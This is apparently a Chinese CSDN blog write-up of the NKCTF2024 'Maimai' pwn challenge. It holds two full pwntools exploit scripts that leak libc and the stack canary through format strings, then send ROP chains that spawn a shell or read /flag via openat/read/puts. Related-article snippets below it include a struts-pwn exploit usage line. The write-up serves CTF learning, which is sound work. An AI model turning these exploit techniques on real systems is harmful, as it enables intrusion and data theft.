[NKCTF2024]-PWN:Maimai查分器解析(orw,用openat代替open)

最新推荐文章于 2024-09-14 08:25:16 发布
最新推荐文章于 2024-09-14 08:25:16 发布
阅读量533 收藏 4
点赞数 5
分类专栏: PWN 文章标签: python 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/137022087
版权
文章讲述了作者使用IDA进行逆向工程,通过构造payload和利用ropgadget实现对远程目标程序的缓冲区溢出攻击,获取shell权限的过程,涉及到了系统调用、canary值、栈溢出技巧以及文件操作等技术。
摘要由CSDN通过智能技术生成

查看保护

查看ida

根据官方的wp的意思解法应该像这样

完整exp(远程打不通):

from pwn import*
context(log_level='debug')
p=process('./maimai')
#p=remote('node.nkctf.yuzhian.com.cn',37717)

p.sendlineafter(b'Select a option:',b'1')
p.sendlineafter(b'Input chart level and rank.',b'14')
p.sendline(b'SSS+')
for i in range(49):
    p.sendline(b'14')
    p.sendline(b'SSS+')
p.sendlineafter(b'Select a option:',b'2')
payload=b'%33$p'
p.sendlineafter(b'Input your nickname.',payload)
p.recvuntil(b'0x')
libc_start_main128=int((b'0x'+p.recv(12)),16)
print(libc_start_main128)
libc_start_main=libc_start_main128-128
libc=ELF('./libc.so.6')
libcbase=libc_start_main-libc.sym['__libc_start_main']
pop_rdi=libcbase+0x2a3e5
ret=libcbase+0x29139
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
p.sendlineafter(b'Can you teach me how to play maimai?',b'aa')
p.sendlineafter(b'Select a option:',b'2')
payload=b'%7$p'
p.sendafter(b'Input your nickname.',payload)
p.recvuntil(b'0x')
canary=int((b'0x'+p.recv(16)),16)
print(hex(canary))
payload=b'a'*0x28+p64(canary)+b'a'*8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendlineafter(b'Can you teach me how to play maimai?',payload)

p.interactive()

 但是getshell之后根本没权限打开flag,所以只能考虑用orw直接读文件

完整exp:

from pwn import*
context(log_level='debug')
p=process('./maimai')
#p=remote('node.nkctf.yuzhian.com.cn',37717)

p.sendlineafter(b'Select a option:',b'1')
p.sendlineafter(b'Input chart level and rank.',b'14')
p.sendline(b'SSS+')
for i in range(49):
    p.sendline(b'14')
    p.sendline(b'SSS+')
p.sendlineafter(b'Select a option:',b'2')
payload=b'%33$p'
p.sendlineafter(b'Input your nickname.',payload)
p.recvuntil(b'0x')
libc_start_main128=int((b'0x'+p.recv(12)),16)
print(libc_start_main128)
libc_start_main=libc_start_main128-128
libc=ELF('./libc.so.6')
libcbase=libc_start_main-libc.sym['__libc_start_main']
pop_rdi=libcbase+0x2a3e5
pop_rsi=libcbase+0x2be51
pop_rdx_r12=libcbase+0x11f2e7
ret=libcbase+0x29139
system=libcbase+libc.sym['system']
reads=libcbase+libc.sym['read']
binsh=libcbase+next(libc.search(b'/bin/sh'))
p.sendlineafter(b'Can you teach me how to play maimai?',b'aa')
p.sendlineafter(b'Select a option:',b'2')
payload=b'%7$p%8$p'
p.sendafter(b'Input your nickname.',payload)
p.recvuntil(b'0x')
canary=int((b'0x'+p.recv(16)),16)
print(hex(canary))
p.recvuntil(b'0x')
onestack=int((b'0x'+p.recv(12)),16)
print(hex(onestack))
payload=b'/flag\x00'
payload=payload.ljust(0x28,b'a')
payload+=p64(canary)+b'a'*8+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(onestack+0x8)+p64(pop_rdx_r12)+p64(0x1000)+p64(0)+p64(reads)
p.sendlineafter(b'Can you teach me how to play maimai?',payload)
print(len(payload))
openat=libcbase+libc.sym['openat']
puts=libcbase+libc.sym['puts']
payload=p64(pop_rsi)+p64(onestack-0x70)+p64(pop_rdx_r12)+p64(0)*2+p64(openat)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(onestack-0x70)+p64(pop_rdx_r12)+p64(0x1000)+p64(0)+p64(reads)
payload+=p64(pop_rdi)+p64(onestack-0x70)+p64(puts)
p.sendline(payload)
p.interactive()

#补充点1:

payload+=p64(canary)+b'a'*8+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(onestack+0x8)+p64(pop_rdx_r12)+p64(0x1000)+p64(0)+p64(reads)

这里的的onestack+0x8是为了在之前构造的ROP链里接上新输入的ROP链

#补充点2:0x80的大小不足以读文件,所以要再次构建read函数,设置大的输入字节

#补充点3:openat函数必须要填入三个参数,

  1. 第一个参数:文件描述符,用于指定路径解析的起点。
  2. 第二个参数:文件路径名,要打开的文件的路径。
  3. 第三个参数:标志位,用于指定文件的打开方式和权限等信息。

 这里文件描述符设置为0是表示在当前目录解析路径,标志位设置为0是用默认方式打开文件

clxhzg
关注
专栏目录
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
2023 年重庆市大学生信息安全竞赛线上初赛 | PWN
weixin_51890658的博客
10-28 371
1.babyshell2.just_read1.babyshellnx关闭了的,堆栈可读可写可执行,拖入ida分析在初始化时开了沙盒,这些为黑名单,不能使用,本来想用open,read,write来获取flag的,但是禁用了open(调用号为2),还好可以使用openat,它的调用号为257int openat(int dirfd, const char *pathname, int flags, mode_t mode)如果pathname指定的是绝对路径。这种情况下,dirfd参数将被忽略,openat
[NSSCTF 2nd] NSS两周年纪念赛。
weixin_52640415的博客
08-28 1016
ORW代替openat+readv+writev open+pread64+write 费马小定理逆推 jadx翻译不准确的类型错误。
沙盒绕过:orw的两种利用方式
2302_79813730的博客
02-02 1750
接下来借一道例题来讲一下orwopen,read,write)的两种利用方式,open(打开)flag文件,将他read(读入)该有的位置,并(write)写出来,一般选取的都是bss段,但这里一般没有那么大的权限,就需要mprotect去该权限(前边已经讲过了,这个也是沙箱的基础),再利用orw。2直接进行计算,通过脚本可以知道,我们payload链读入到bss+0x28的位置,p64()打包为八个字节,中间有个*2要注意,再算上返回地址本身,一共是0x48,也就计算出来了。
NKCTF--pwn--Maimai查分
fuiifiuiii的博客
03-25 504
怀疑可能远程的内部程序偏移不同,用-1到-8,+1到+8试,结果到+4的时候,欸?(后来发现是第二个payload里的4个A给输进去了,不知道为什么我本地不会这么输进去,远程却会()不过当时确实应该好好看看打印出来的东西,确实多了4个A)转换思路:栈溢出后自行用一个read,设置特别大的字节,由于想用orw嘛,就泄露了栈的地址,同时也可以作为这个read的地址。(不知道是不是修复了还是我的问题)没加是因为我本地之前正常不用+,然后本地调完忘了改,现在突然发现。好吧好吧,总算是做出来一个,没被零封()()
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机对机的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --...该项目仅用
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar ...
PWN_3 ORW
weixin_30781107的博客
02-18 694
2018-02-18 15:44:34 Open Write Read open函数 #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int open(const char *pathname, int...
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 393
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
2021 蓝帽杯 pwn slient
weixin_51298357的博客
04-29 915
2021 蓝帽杯 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
BUUCTF pwn 五月刷题
coco的博客
05-04 707
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
Dasctf 6月赛其余pwn WP
qq_31457355的博客
11-01 601
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
pwnable.tw - orw
不急不躁
07-09 3037
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
Python办公自动化案例(二):对比两个Excel数据内容并标出不同
最新发布
衍生星球的博客
09-14 151
在数据处理和分析的日常工作中,我们经常需要比较两个Excel文件的差异。这可能是为了验证数据的一致性、检查数据的准确性,或者在版本控制中追踪更改。手动比较这些文件不仅耗时,而且容易出错。幸运的是,Pythonopenpyxl库提供了一种自动化这一过程的方法。
蒙特卡罗方法——布丰投针实验近似计算圆周率python代码实现
2301_79376014的博客
09-09 516
蒙特卡罗——布丰实验
Python实现多线程、多进程及协程
qq_42568323的博客
09-09 1105
本文详细介绍了 Python 中多线程、多进程和协程的并发模型及其实现方式,并通过具体场景演示了如何使用面向对象思想实现这些模型。在实际应用中,应根据任务的类型和需求选择合适的并发模型,从而优化程序的性能和资源利用率。本文将详细介绍 Python 中的多线程、多进程和协程的概念及其实现方式,并通过具体场景展示如何在 Python 中使用面向对象的思想实现这些并发模型。接下来,我们通过一个计算密集型任务的示例来演示多进程的实现:计算一系列大数字的阶乘。主程序中创建并启动了多个计算进程,并使用。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值